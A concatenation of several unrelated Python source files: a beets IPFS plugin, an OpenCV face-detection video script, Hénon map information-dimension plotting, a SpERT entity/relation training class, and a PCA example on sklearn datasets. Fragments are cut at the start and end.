# print(infos)
return infos
def write_mission_config():
Mission_Id = '10002'
write_page_flag(Mission_Id)
write_page_config(Mission_Id)
if __name__ == '__main__':
write_mission_config()
|
# This file is part of beets.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Adds support for ipfs. Requires go-ipfs and a running ipfs daemon
"""
from beets import ui, util, library, config
from beets.plugins import BeetsPlugin
from beets.util import syspath
import subprocess
import shutil
import os
import tempfile
class IPFSPlugin(BeetsPlugin):
def __init__(self):
super().__init__()
self.config.add({
'auto': True,
'nocopy': False,
})
if self.config['auto']:
self.import_stages = [self.auto_add]
def commands(self):
cmd = ui.Subcommand('ipfs',
help='interact with ipfs')
cmd.parser.add_option('-a', '--add', dest='add',
action='store_true',
help='Add to ipfs')
cmd.parser.add_option('-g', '--get', dest='get',
action='store_true',
help='Get from ipfs')
cmd.parser.add_option('-p', '--publish', dest='publish',
action='store_true',
help='Publish local library to ipfs')
cmd.parser.add_option('-i', '--import', dest='_import',
action='store_true',
help='Import remote library from ipfs')
cmd.parser.add_option('-l', '--list', dest='_list',
action='store_true',
help='Query imported libraries')
cmd.parser.add_option('-m', '--play', dest='play',
action='store_true',
help='Play music from remote libraries')
def func(lib, opts, args):
if opts.add:
for album in lib.albums(ui.decargs(args)):
if len(album.items()) == 0:
self._log.info('{0} does not contain items, aborting',
album)
self.ipfs_add(album)
album.store()
if opts.get:
self.ipfs_get(lib, ui.decargs(args))
if opts.publish:
self.ipfs_publish(lib)
if opts._import:
self.ipfs_import(lib, ui.decargs(args))
if opts._list:
self.ipfs_list(lib, ui.decargs(args))
if opts.play:
self.ipfs_play(lib, opts, ui.decargs(args))
cmd.func = func
return [cmd]
def auto_add(self, session, task):
if task.is_album:
if self.ipfs_add(task.album):
task.album.store()
def ipfs_play(self, lib, opts, args):
from beetsplug.play import PlayPlugin
jlib = self.get_remote_lib(lib)
player = PlayPlugin()
config['play']['relative_to'] = None
player.album = True
player.play_music(jlib, player, args)
def ipfs_add(self, album):
try:
album_dir = album.item_dir()
except AttributeError:
return False
try:
if album.ipfs:
self._log.debug('{0} already added', album_dir)
# Already added to ipfs
return False
except AttributeError:
pass
self._log.info('Adding {0} to ipfs', album_dir)
if self.config['nocopy']:
cmd = "ipfs add --nocopy -q -r".split()
else:
cmd = "ipfs add -q -r".split()
cmd.append(album_dir)
try:
output = util.command_output(cmd).stdout.split()
except (OSError, subprocess.CalledProcessError) as exc:
self._log.error('Failed to add {0}, error: {1}', album_dir, exc)
return False
length = len(output)
for linenr, line in enumerate(output):
line = line.strip()
if linenr == length - 1:
# last printed line is the album hash
self._log.info("album: {0}", line)
album.ipfs = line
else:
try:
item = album.items()[linenr]
self._log.info("item: {0}", line)
item.ipfs = line
item.store()
except IndexError:
# if there's non music files in the to-add folder they'll
# get ignored here
pass
return True
def ipfs_get(self, lib, query):
query = query[0]
# Check if query is a hash
# TODO: generalize to other hashes; probably use a multihash
# implementation
if query.startswith("Qm") and len(query) == 46:
self.ipfs_get_from_hash(lib, query)
else:
albums = self.query(lib, query)
for album in albums:
self.ipfs_get_from_hash(lib, album.ipfs)
def ipfs_get_from_hash(self, lib, _hash):
try:
cmd = "ipfs get".split()
cmd.append(_hash)
util.command_output(cmd)
except (OSError, subprocess.CalledProcessError) as err:
self._log.error('Failed to get {0} from ipfs.\n{1}',
_hash, err.output)
return False
self._log.info('Getting {0} from ipfs', _hash)
imp = ui.commands.TerminalImportSession(lib, loghandler=None,
query=None, paths=[_hash])
imp.run()
# This uses a relative path, hence we cannot use util.syspath(_hash,
# prefix=True). However, that should be fine since the hash will not
# exceed MAX_PATH.
shutil.rmtree(syspath(_hash, prefix=False))
def ipfs_publish(self, lib):
with tempfile.NamedTemporaryFile() as tmp:
self.ipfs_added_albums(lib, tmp.name)
try:
if self.config['nocopy']:
cmd = "ipfs add --nocopy -q ".split()
else:
cmd = "ipfs add -q ".split()
cmd.append(tmp.name)
output = util.command_output(cmd).stdout
except (OSError, subprocess.CalledProcessError) as err:
msg = f"Failed to publish library. Error: {err}"
self._log.error(msg)
return False
self._log.info("hash of library: {0}", output)
def ipfs_import(self, lib, args):
_hash = args[0]
if len(args) > 1:
lib_name = args[1]
else:
lib_name = _hash
lib_root = os.path.dirname(lib.path)
remote_libs = os.path.join(lib_root, b"remotes")
if not os.path.exists(remote_libs):
try:
os.makedirs(remote_libs)
except OSError as e:
msg = f"Could not create {remote_libs}. Error: {e}"
self._log.error(msg)
return False
path = os.path.join(remote_libs, lib_name.encode() + b".db")
if not os.path.exists(path):
cmd = f"ipfs get {_hash} -o".split()
cmd.append(path)
try:
util.command_output(cmd)
except (OSError, subprocess.CalledProcessError):
self._log.error(f"Could not import {_hash}")
return False
# add all albums from remotes into a combined library
jpath = os.path.join(remote_libs, b"joined.db")
jlib = library.Library(jpath)
nlib = library.Library(path)
for album in nlib.albums():
if not self.already_added(album, jlib):
new_album = []
for item in album.items():
item.id = None
new_album.append(item)
added_album = jlib.add_album(new_album)
added_album.ipfs = album.ipfs
added_album.store()
def already_added(self, check, jlib):
for jalbum in jlib.albums():
if jalbum.mb_albumid == check.mb_albumid:
return True
return False
def ipfs_list(self, lib, args):
fmt = config['format_album'].get()
try:
albums = self.query(lib, args)
except OSError:
ui.print_("No imported libraries yet.")
return
for album in albums:
ui.print_(format(album, fmt), " : ", album.ipfs.decode())
def query(self, lib, args):
rlib = self.get_remote_lib(lib)
albums = rlib.albums(args)
return albums
def get_remote_lib(self, lib):
lib_root = os.path.dirname(lib.path)
remote_libs = os.path.join(lib_root, b"remotes")
path = os.path.join(remote_libs, b"joined.db")
if not os.path.isfile(path):
raise OSError
return library.Library(path)
def ipfs_added_albums(self, rlib, tmpname):
""" Returns a new library with only albums/items added to ipfs
"""
tmplib = library.Library(tmpname)
for album in rlib.albums():
try:
if album.ipfs:
self.create_new_album(album, tmplib)
except AttributeError:
pass
return tmplib
def create_new_album(self, album, tmplib):
items = []
for item in album.items():
try:
if not item.ipfs:
break
except AttributeError:
pass
item_path = os.path.basename(item.path).decode(
util._fsencoding(), 'ignore'
)
# Clear current path from item
item.path = f'/ipfs/{album.ipfs}/{item_path}'
item.id = None
items.append(item)
if len(items) < 1:
return False
self._log.info("Adding '{0}' to temporary library", album)
new_album = tmplib.add_album(items)
new_album.ipfs = album.ipfs
new_album.store(inherit=False)
|
# This file conveniently draws the bboxes from a given video file instead of your webcam. It's all ran from 1 function.
# It will plot the centroid bounding box in red and the original detected faces in blue.
import cv2
import numpy as np
# Used for clustering ( groupRectangles() )
eps = 1.5
face_cascade = cv2.CascadeClassifier('/Users/jeremy.meyer/opencv/data/haarcascades/haarcascade_frontalface_default.xml')
# Draws bounding box and text from coordinates.
def bbox(img, x1, y1, x2, y2, base_color=(255, 0, 0), text='Human Detected'):
x_adj = 12*len(text)
y_adj = 17
cv2.rectangle(img, (x1, y1), (x2, y2), base_color, 2)
if y1 > 20:
cv2.rectangle(img, (x1, y1 - y_adj), (x1 + x_adj, y1 - 1), np.array(base_color) / 5, -1)
cv2.putText(img, text, (x1, y1 - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, base_color)
else:
cv2.rectangle(img, (x1, y2 + y_adj), (x1 + x_adj, y2 + 1), np.array(base_color) / 5, -1)
cv2.putText(img, text, (x1, y2 + y_adj - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, base_color)
def readvideo(filepath, fps, playback_multiplier=1):
cap = cv2.VideoCapture(filepath)
while cap.isOpened():
ret, frame = cap.read()
if ret:
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray)
grouped = cv2.groupRectangles(list(faces), 1, eps=eps)
# Draws bboxes on original calculated faces in blue
for (x, y, w, h) in faces:
bbox(frame, x, y, x + w, y + h, (255, 175, 0))
# Draws centroid rectangle in red
for (x, y, w, h) in grouped[0]:
bbox(frame, x, y, x + w, y + h, (0, 0, 255), "Human (Averaged)")
cv2.imshow('playback', frame)
if cv2.waitKey(round(1000/fps * 1/playback_multiplier)) == ord('q'):
break
else:
break
cv2.destroyAllWindows()
cap.release()
# Example:
readvideo('testVid.mp4', 15, 2)
|
import numpy as np
from math import log2
import scipy.optimize as optimization
from matplotlib.pyplot import figure, show, cm
import full_henon as fh
import helper as he
def closest(lst, val):
""" Finding closest value in list """
lst = np.asarray(lst)
ind = (np.abs(lst - val)).argmin()
return lst[ind], ind
def return_plot(xS, yS, its, a, b, saveFig=None):
""" Plot the return plot of the Hénon map """
dif = 1e-5
xv, yv = fh.Henon(xS, yS, its, a, b) # Iterating Henon map
x2, y2 = fh.Henon(xS+dif, yS+dif, its, a, b) # Different starting point
# Plotting
fig = figure(figsize=(15,6))
frame = fig.add_subplot(1,1,1)
frame.scatter(xv, x2, color="navy", marker="o", s=0.01)
frame.set_xlabel("$x_n$", fontsize=20)
frame.set_ylabel("$x_{n+1}$", fontsize=20)
frame.grid(zorder=2)
if saveFig: fig.savefig(str(saveFig))
else: show()
def hist_plot(xv, nBins, saveFig=None):
""" Plot a histogram of a set of x points """
# Plotting
fig = figure(figsize=(15,8))
frame = fig.add_subplot(1,1,1)
frame.hist(xv, nBins, label="$x$", color="teal", rwidth=0.9)
frame.set_xlabel("$x$", fontsize=20)
frame.set_ylabel("Frequency", fontsize=20)
frame.tick_params(axis="both", labelsize=15)
if saveFig: fig.savefig(saveFig)
else: show()
def box_henon(xv, yv, nBoxes, xSpace=0.05, ySpace=0.05, saveFig=None):
""" Plot the Hénon map divided into boxes """
xMin, xMax = min(xv)-xSpace, max(xv)+xSpace # x limit of plot
yMin, yMax = min(yv)-ySpace, max(yv)+ySpace # y limit of plot
xBoxes = np.linspace(xMin, xMax, nBoxes+1) # x coordinates of box lines
yBoxes = np.linspace(yMin, yMax, nBoxes+1) # y coordinates of box lines
totBoxes = nBoxes * nBoxes # Number of boxes
text = np.linspace(1, totBoxes, totBoxes, dtype=int) # Labels
# Determining height of labels in plot
if nBoxes >= 4:
ySize = 4 * (max(yBoxes) - min(yBoxes)) / (nBoxes * len(yBoxes))
else: ySize = (max(yBoxes) - min(yBoxes)) / len(yBoxes)
pad = 0.08 / nBoxes # x padding for text
# Finding the locations of the text labels
xLocations = [xBoxes[yInd] + pad for xInd in range(len(xBoxes)-1)
for yInd in range(len(yBoxes)-1)]
yLocations = [yBoxes[xInd] + ySize for xInd in range(len(xBoxes)-1)
for yInd in range(len(yBoxes)-1)]
# Plotting
fig = figure(figsize=(15,8))
frame = fig.add_subplot(1,1,1)
frame.scatter(xv, yv, s=0.5, color="navy") # The Hénon map
for xLim in xBoxes:
frame.axvline(xLim, color="k", lw=1.3, zorder=3) # Vertical box lines
for yLim in yBoxes:
frame.axhline(yLim, color="k", lw=1.3, zorder=3) # Horizontal box lines
# Adding text
for i in range(len(xLocations)):
frame.text(xLocations[i], yLocations[i], text[i], fontsize=15, zorder=3)
# Setting axes
frame.set_xlabel("$x$", fontsize=20)
frame.set_ylabel("$y$", fontsize=20)
frame.tick_params(axis="both", labelsize=15)
# Setting plot limits
frame.set_xlim(xMin, xMax)
frame.set_ylim(yMin, yMax)
if saveFig: fig.savefig(saveFig)
else: show()
def mean_fig(nSize, nRuns):
""" Plot ratio geometric mean over arithmic mean, always < 1. """
nSize = int(nSize)
ratios = []
for run in range(nRuns):
randNumbs = np.random.uniform(low=1e-2, high=5, size=nSize) # Random
geomMean = np.prod(randNumbs)**(1/nSize) # Geometric mean
arithMean = sum(randNumbs) / nSize # Arithmetic mean
ratios.append(geomMean / arithMean)
# Plotting
fig = figure(figsize=(15,8))
frame = fig.add_subplot(1,1,1)
frame2 = frame.twinx()
frame.scatter(np.asarray(range(nRuns))/nRuns, 1-np.sort(ratios),
color="teal", marker="o", s=5)
frame2.hist(1-np.asarray(ratios), bins=int(nRuns/50), density=True,
histtype="step", color="forestgreen", lw=1.5)
frame.set_xlabel("Run")
frame.set_ylabel("Ratio")
frame.grid()
show()
def weight_boxes(x, y, start, power, plot=False, text=False):
""" Function to find and plot the number of points in each box compared to
the total number of boxes.
"""
nBox = start**power # Number of boxes
boxes = np.zeros((nBox, nBox)) # Creating the boxes
xCoords = np.linspace(min(x)-.1, max(x)+.1, nBox+1) # x limits of boxes
yCoords = np.linspace(min(y)-.05, max(y)+.05, nBox+1) # y limits of boxes
for ind, x in enumerate(x):
xV, xPos = closest(xCoords, x)
yV, yPos = closest(yCoords, y[ind])
if x <= xV: xPos -= 1
if y[ind] <= yV: yPos -= 1
if yPos == -1: yPos = 0
boxes[abs(nBox-1-yPos)][xPos] += 1
# Normalizing boxes
redBox = boxes / np.sum(boxes)
if plot:
# Plotting
fig = figure(figsize=(14,8))
frame = fig.add_subplot(1,1,1)
if text:
for xInd in range(len(xCoords)-1):
for yInd in range(len(yCoords)-1):
label = f"{redBox[yInd][xInd]:.3f}"
frame.text(xCoords[xInd], yCoords[yInd], label,
va='center', ha='center')
im = frame.imshow(boxes, cmap=cm.inferno)
fig.colorbar(im)
show()
return redBox
def inform_dim(x, y, start, power):
""" Calculate the information dimension of the Hénon map """
boxes = weight_boxes(x, y, start, power) # Values of the boxes
I = 0 # Bits of information
for b in boxes:
for box in b:
if box != 0: I -= box * log2(box) # -log(x) = log(1/x)
return I
def change_dim(base, pRange, xv, yv, saveFig=None):
""" Function to find and plot the information dimension. """
inf = [inform_dim(xv, yv, base, p) for p in pRange] # Information
# Linear fit
def lin_fit(x, i0, di):
return i0 + di * x
para, cov = optimization.curve_fit(lin_fit, pRange, inf) # Fitting
perr = np.sqrt(np.diag(cov)) # Errors
# Printing the results
print(f"The constant = {para[0]:.3f}")
print(f"The information dimension = {para[1]}")
print(f"The error = {perr}")
# Making line for plotting
xVals = np.linspace(min(pRange), max(pRange), 100)
yVals = lin_fit(xVals, para[0], para[1])
lab = f"$I(k)$ = {para[1]:.3f}$* k$ + {para[0]:.2f}"
# Plotting
fig = figure(figsize=(15,8))
frame = fig.add_subplot(1,1,1)
frame.scatter(pRange, inf, color="navy", marker="X", s=150, zorder=3)
frame.plot(xVals, yVals, color="darkred", label=lab, lw=2)
frame.tick_params(axis="both", labelsize=15)
frame.set_xlabel("k", fontsize=20)
frame.set_ylabel("Information (bits)", fontsize=20)
frame.legend(fontsize=20)
frame.grid(zorder=2)
if saveFig: fig.savefig(str(saveFig))
else: show()
|
import argparse
import math
import os
import torch
from torch.nn import DataParallel
from torch.optim import Optimizer
import transformers
from torch.utils.data import DataLoader
from transformers import AdamW, BertConfig
from transformers import BertTokenizer
from spert import models
from spert import sampling
from spert import util
from spert.entities import Dataset
from spert.evaluator import Evaluator
from spert.input_reader import JsonInputReader, BaseInputReader
from spert.loss import SpERTLoss, Loss
from tqdm import tqdm
from spert.trainer import BaseTrainer
SCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))
class SpERTTrainer(BaseTrainer):
""" Joint entity and relation extraction training and evaluation """
def __init__(self, args: argparse.Namespace):
super().__init__(args)
# byte-pair encoding
self._tokenizer = BertTokenizer.from_pretrained(args.tokenizer_path,
do_lower_case=args.lowercase,
cache_dir=args.cache_path)
# path to export predictions to
self._predictions_path = os.path.join(self._log_path, 'predictions_%s_epoch_%s.json')
# path to export relation extraction examples to
self._examples_path = os.path.join(self._log_path, 'examples_%s_%s_epoch_%s.html')
def train(self, train_path: str, valid_path: str, types_path: str, input_reader_cls: BaseInputReader):
args = self.args
train_label, valid_label = 'train', 'valid'
self._logger.info("Datasets: %s, %s" % (train_path, valid_path))
self._logger.info("Model type: %s" % args.model_type)
# create log csv files
self._init_train_logging(train_label)
self._init_eval_logging(valid_label)
# read datasets
input_reader = input_reader_cls(types_path, self._tokenizer, args.neg_entity_count,
args.neg_relation_count, args.max_span_size, self._logger)
input_reader.read({train_label: train_path, valid_label: valid_path})
self._log_datasets(input_reader)
train_dataset = input_reader.get_dataset(train_label)
train_sample_count = train_dataset.document_count
updates_epoch = train_sample_count // args.train_batch_size
updates_total = updates_epoch * args.epochs
validation_dataset = input_reader.get_dataset(valid_label)
self._logger.info("Updates per epoch: %s" % updates_epoch)
self._logger.info("Updates total: %s" % updates_total)
# create model
model_class = models.get_model(self.args.model_type)
# load model
config = BertConfig.from_pretrained(self.args.model_path, cache_dir=self.args.cache_path)
util.check_version(config, model_class, self.args.model_path)
config.spert_version = model_class.VERSION
model = model_class.from_pretrained(self.args.model_path,
config=config,
# SpERT model parameters
cls_token=self._tokenizer.convert_tokens_to_ids('[CLS]'),
relation_types=input_reader.relation_type_count - 1,
entity_types=input_reader.entity_type_count,
max_pairs=self.args.max_pairs,
prop_drop=self.args.prop_drop,
size_embedding=self.args.size_embedding,
freeze_transformer=self.args.freeze_transformer,
cache_dir=self.args.cache_path)
# SpERT is currently optimized on a single GPU and not thoroughly tested in a multi GPU setup
# If you still want to train SpERT on multiple GPUs, uncomment the following lines
# # parallelize model
# if self._device.type != 'cpu':
# model = torch.nn.DataParallel(model)
model.to(self._device)
# create optimizer
optimizer_params = self._get_optimizer_params(model)
optimizer = AdamW(optimizer_params, lr=args.lr, weight_decay=args.weight_decay, correct_bias=False)
# create scheduler
scheduler = transformers.get_linear_schedule_with_warmup(optimizer,
num_warmup_steps=args.lr_warmup * updates_total,
num_training_steps=updates_total)
# create loss function
rel_criterion = torch.nn.BCEWithLogitsLoss(reduction='none')
entity_criterion = torch.nn.CrossEntropyLoss(reduction='none')
compute_loss = SpERTLoss(rel_criterion, entity_criterion, model, optimizer, scheduler, args.max_grad_norm)
# eval validation set
if args.init_eval:
self._eval(model, validation_dataset, input_reader, 0, updates_epoch)
# train
for epoch in range(args.epochs):
# train epoch
self._train_epoch(model, compute_loss, optimizer, train_dataset, updates_epoch, epoch)
# eval validation sets
if not args.final_eval or (epoch == args.epochs - 1):
self._eval(model, validation_dataset, input_reader, epoch + 1, updates_epoch)
# save final model
extra = dict(epoch=args.epochs, updates_epoch=updates_epoch, epoch_iteration=0)
global_iteration = args.epochs * updates_epoch
self._save_model(self._save_path, model, self._tokenizer, global_iteration,
optimizer=optimizer if self.args.save_optimizer else None, extra=extra,
include_iteration=False, name='final_model')
self._logger.info("Logged in: %s" % self._log_path)
self._logger.info("Saved in: %s" % self._save_path)
self._close_summary_writer()
def eval(self, dataset_path: str, types_path: str, input_reader_cls: BaseInputReader):
args = self.args
dataset_label = 'test'
self._logger.info("Dataset: %s" % dataset_path)
self._logger.info("Model: %s" % args.model_type)
# create log csv files
self._init_eval_logging(dataset_label)
# read datasets
input_reader = input_reader_cls(types_path, self._tokenizer,
max_span_size=args.max_span_size, logger=self._logger)
input_reader.read({dataset_label: dataset_path})
self._log_datasets(input_reader)
# create model
model_class = models.get_model(self.args.model_type)
config = BertConfig.from_pretrained(self.args.model_path, cache_dir=self.args.cache_path)
util.check_version(config, model_class, self.args.model_path)
model = model_class.from_pretrained(self.args.model_path,
config=config,
# SpERT model parameters
cls_token=self._tokenizer.convert_tokens_to_ids('[CLS]'),
relation_types=input_reader.relation_type_count - 1,
entity_types=input_reader.entity_type_count,
max_pairs=self.args.max_pairs,
prop_drop=self.args.prop_drop,
size_embedding=self.args.size_embedding,
freeze_transformer=self.args.freeze_transformer,
cache_dir=self.args.cache_path)
model.to(self._device)
# evaluate
self._eval(model, input_reader.get_dataset(dataset_label), input_reader)
self._logger.info("Logged in: %s" % self._log_path)
self._close_summary_writer()
def _train_epoch(self, model: torch.nn.Module, compute_loss: Loss, optimizer: Optimizer, dataset: Dataset,
updates_epoch: int, epoch: int):
self._logger.info("Train epoch: %s" % epoch)
# create data loader
dataset.switch_mode(Dataset.TRAIN_MODE)
data_loader = DataLoader(dataset, batch_size=self.args.train_batch_size, shuffle=True, drop_last=True,
num_workers=self.args.sampling_processes, collate_fn=sampling.collate_fn_padding)
model.zero_grad()
iteration = 0
total = dataset.document_count // self.args.train_batch_size
for batch in tqdm(data_loader, total=total, desc='Train epoch %s' % epoch):
model.train()
batch = util.to_device(batch, self._device)
# forward step
entity_logits, rel_logits = model(encodings=batch['encodings'], context_masks=batch['context_masks'],
entity_masks=batch['entity_masks'], entity_sizes=batch['entity_sizes'],
relations=batch['rels'], rel_masks=batch['rel_masks'])
# compute loss and optimize parameters
batch_loss = compute_loss.compute(entity_logits=entity_logits, rel_logits=rel_logits,
rel_types=batch['rel_types'], entity_types=batch['entity_types'],
entity_sample_masks=batch['entity_sample_masks'],
rel_sample_masks=batch['rel_sample_masks'])
# logging
iteration += 1
global_iteration = epoch * updates_epoch + iteration
if global_iteration % self.args.train_log_iter == 0:
self._log_train(optimizer, batch_loss, epoch, iteration, global_iteration, dataset.label)
return iteration
def _eval(self, model: torch.nn.Module, dataset: Dataset, input_reader: JsonInputReader,
epoch: int = 0, updates_epoch: int = 0, iteration: int = 0):
self._logger.info("Evaluate: %s" % dataset.label)
if isinstance(model, DataParallel):
# currently no multi GPU support during evaluation
model = model.module
# create evaluator
evaluator = Evaluator(dataset, input_reader, self._tokenizer,
self.args.rel_filter_threshold, self.args.no_overlapping, self._predictions_path,
self._examples_path, self.args.example_count, epoch, dataset.label)
# create data loader
dataset.switch_mode(Dataset.EVAL_MODE)
data_loader = DataLoader(dataset, batch_size=self.args.eval_batch_size, shuffle=False, drop_last=False,
num_workers=self.args.sampling_processes, collate_fn=sampling.collate_fn_padding)
with torch.no_grad():
model.eval()
# iterate batches
total = math.ceil(dataset.document_count / self.args.eval_batch_size)
for batch in tqdm(data_loader, total=total, desc='Evaluate epoch %s' % epoch):
# move batch to selected device
batch = util.to_device(batch, self._device)
# run model (forward pass)
result = model(encodings=batch['encodings'], context_masks=batch['context_masks'],
entity_masks=batch['entity_masks'], entity_sizes=batch['entity_sizes'],
entity_spans=batch['entity_spans'], entity_sample_masks=batch['entity_sample_masks'],
evaluate=True)
entity_clf, rel_clf, rels = result
# evaluate batch
evaluator.eval_batch(entity_clf, rel_clf, rels, batch)
global_iteration = epoch * updates_epoch + iteration
ner_eval, rel_eval, rel_nec_eval = evaluator.compute_scores()
self._log_eval(*ner_eval, *rel_eval, *rel_nec_eval,
epoch, iteration, global_iteration, dataset.label)
if self.args.store_predictions and not self.args.no_overlapping:
evaluator.store_predictions()
if self.args.store_examples:
evaluator.store_examples()
def _get_optimizer_params(self, model):
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_params = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
'weight_decay': self.args.weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}]
return optimizer_params
def _log_train(self, optimizer: Optimizer, loss: float, epoch: int,
iteration: int, global_iteration: int, label: str):
# average loss
avg_loss = loss / self.args.train_batch_size
# get current learning rate
lr = self._get_lr(optimizer)[0]
# log to tensorboard
self._log_tensorboard(label, 'loss', loss, global_iteration)
self._log_tensorboard(label, 'loss_avg', avg_loss, global_iteration)
self._log_tensorboard(label, 'lr', lr, global_iteration)
# log to csv
self._log_csv(label, 'loss', loss, epoch, iteration, global_iteration)
self._log_csv(label, 'loss_avg', avg_loss, epoch, iteration, global_iteration)
self._log_csv(label, 'lr', lr, epoch, iteration, global_iteration)
def _log_eval(self, ner_prec_micro: float, ner_rec_micro: float, ner_f1_micro: float,
ner_prec_macro: float, ner_rec_macro: float, ner_f1_macro: float,
rel_prec_micro: float, rel_rec_micro: float, rel_f1_micro: float,
rel_prec_macro: float, rel_rec_macro: float, rel_f1_macro: float,
rel_nec_prec_micro: float, rel_nec_rec_micro: float, rel_nec_f1_micro: float,
rel_nec_prec_macro: float, rel_nec_rec_macro: float, rel_nec_f1_macro: float,
epoch: int, iteration: int, global_iteration: int, label: str):
# log to tensorboard
self._log_tensorboard(label, 'eval/ner_prec_micro', ner_prec_micro, global_iteration)
self._log_tensorboard(label, 'eval/ner_recall_micro', ner_rec_micro, global_iteration)
self._log_tensorboard(label, 'eval/ner_f1_micro', ner_f1_micro, global_iteration)
self._log_tensorboard(label, 'eval/ner_prec_macro', ner_prec_macro, global_iteration)
self._log_tensorboard(label, 'eval/ner_recall_macro', ner_rec_macro, global_iteration)
self._log_tensorboard(label, 'eval/ner_f1_macro', ner_f1_macro, global_iteration)
self._log_tensorboard(label, 'eval/rel_prec_micro', rel_prec_micro, global_iteration)
self._log_tensorboard(label, 'eval/rel_recall_micro', rel_rec_micro, global_iteration)
self._log_tensorboard(label, 'eval/rel_f1_micro', rel_f1_micro, global_iteration)
self._log_tensorboard(label, 'eval/rel_prec_macro', rel_prec_macro, global_iteration)
self._log_tensorboard(label, 'eval/rel_recall_macro', rel_rec_macro, global_iteration)
self._log_tensorboard(label, 'eval/rel_f1_macro', rel_f1_macro, global_iteration)
self._log_tensorboard(label, 'eval/rel_nec_prec_micro', rel_nec_prec_micro, global_iteration)
self._log_tensorboard(label, 'eval/rel_nec_recall_micro', rel_nec_rec_micro, global_iteration)
self._log_tensorboard(label, 'eval/rel_nec_f1_micro', rel_nec_f1_micro, global_iteration)
self._log_tensorboard(label, 'eval/rel_nec_prec_macro', rel_nec_prec_macro, global_iteration)
self._log_tensorboard(label, 'eval/rel_nec_recall_macro', rel_nec_rec_macro, global_iteration)
self._log_tensorboard(label, 'eval/rel_nec_f1_macro', rel_nec_f1_macro, global_iteration)
# log to csv
self._log_csv(label, 'eval', ner_prec_micro, ner_rec_micro, ner_f1_micro,
ner_prec_macro, ner_rec_macro, ner_f1_macro,
rel_prec_micro, rel_rec_micro, rel_f1_micro,
rel_prec_macro, rel_rec_macro, rel_f1_macro,
rel_nec_prec_micro, rel_nec_rec_micro, rel_nec_f1_micro,
rel_nec_prec_macro, rel_nec_rec_macro, rel_nec_f1_macro,
epoch, iteration, global_iteration)
def _log_datasets(self, input_reader):
self._logger.info("Relation type count: %s" % input_reader.relation_type_count)
self._logger.info("Entity type count: %s" % input_reader.entity_type_count)
self._logger.info("Entities:")
for e in input_reader.entity_types.values():
self._logger.info(e.verbose_name + '=' + str(e.index))
self._logger.info("Relations:")
for r in input_reader.relation_types.values():
self._logger.info(r.verbose_name + '=' + str(r.index))
for k, d in input_reader.datasets.items():
self._logger.info('Dataset: %s' % k)
self._logger.info("Document count: %s" % d.document_count)
self._logger.info("Relation count: %s" % d.relation_count)
self._logger.info("Entity count: %s" % d.entity_count)
self._logger.info("Context size: %s" % input_reader.context_size)
def _init_train_logging(self, label):
self._add_dataset_logging(label,
data={'lr': ['lr', 'epoch', 'iteration', 'global_iteration'],
'loss': ['loss', 'epoch', 'iteration', 'global_iteration'],
'loss_avg': ['loss_avg', 'epoch', 'iteration', 'global_iteration']})
def _init_eval_logging(self, label):
self._add_dataset_logging(label,
data={'eval': ['ner_prec_micro', 'ner_rec_micro', 'ner_f1_micro',
'ner_prec_macro', 'ner_rec_macro', 'ner_f1_macro',
'rel_prec_micro', 'rel_rec_micro', 'rel_f1_micro',
'rel_prec_macro', 'rel_rec_macro', 'rel_f1_macro',
'rel_nec_prec_micro', 'rel_nec_rec_micro', 'rel_nec_f1_micro',
'rel_nec_prec_macro', 'rel_nec_rec_macro', 'rel_nec_f1_macro',
'epoch', 'iteration', 'global_iteration']})
|
from sklearn.datasets import *
import numpy as np
import pandas as pd
import math
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler, LabelEncoder
wine = load_wine()
cancer = load_breast_cancer()
boston = load_boston()
df = pd.DataFrame(wine.data, columns=wine.feature_names)
df["target"] = pd.Series(wine.target)
feature_columns = df.columns[df.columns != "target"]
df = df[feature_columns]
# prep pca with a standard scaler to centre the data around the origin
ss = StandardScaler()
scaled_data = ss.fit_transform(df)
# fit transform PCA object
pca = PCA(n_components=min(df.shape[0], df.shape[1]))
pca.fit(scaled_data)
pca_data = pca.transform(scaled_data)
pct_variation = np.round(pca.explained_variance_ratio_ * 100, decimals=1)
labels = ["PC{}".format(x) for x in range(1, len(pct_variation) + 1)]
# run scree plot to see how many principal components should go into the final plot
# select the PCs that describe the most amount of variation in the data
fig, ax = plt.subplots()
ax.bar(x=range(1, len(pct_variation) + 1), height=pct_variation, tick_label=labels)
ax.set(xlabel="Principal Components", ylabel="% Variation", title="Scree Plot of PCA")
plt.show()
# from the PCA plot, we can use the information we learned from the scree plot
# first we put the new coordinates, created by the pca.transform(scaled_data) operation, into a nice matrix
# where the rows have sample labels and the solumns have the PCA labels
pca_df = pd.DataFrame(pca_data, columns=labels)
print(pca_df.head())
# plot using the PCA dataframe
plt.scatter(pca_df.PC1, pca_df.PC1)
plt.title("My PCA Graph")
plt.xlabel("PC1 - {}%".format(pct_variation[0]))
plt.ylabel("PC1 - {}%".format(pct_variation[1]))
# this loop allows us to annotate (put) the sample names to the graph
for sample in pca_df.index:
plt.annotate(sample, (pca_df["PC1"].loc[sample], pca_df["PC2"].loc[sample]))
plt.show()
# Now let's take a look at the loading scores for PC1 to see which features have the largest influence on separating the clusters along the X-axis
# principal components are 0-indexed, so PC1 is at index 0.
loading_scores = pd.Series(pca.components_[0], index=feature_columns)
# sort the loading scores based on their magnitude of influence (absolute value, as some of the loading scores can have a negative value)
sorted_loading_scores = loading_scores.abs().sort_values(ascending=False)
# get top features as a mask criteria for our dataframe
top_features = sorted_loading_scores[:4].index.values
print(sorted_loading_scores)
print(sorted_loading_scores[top_features])
a = np.round(pca.explained_variance_ratio_ *100, decimals=2)
b = pca.components_
print("Eigenvalues for PC1\n{}\n".format(b[0]))
|
def comp(array1, array2):
if None in (array1, array2):
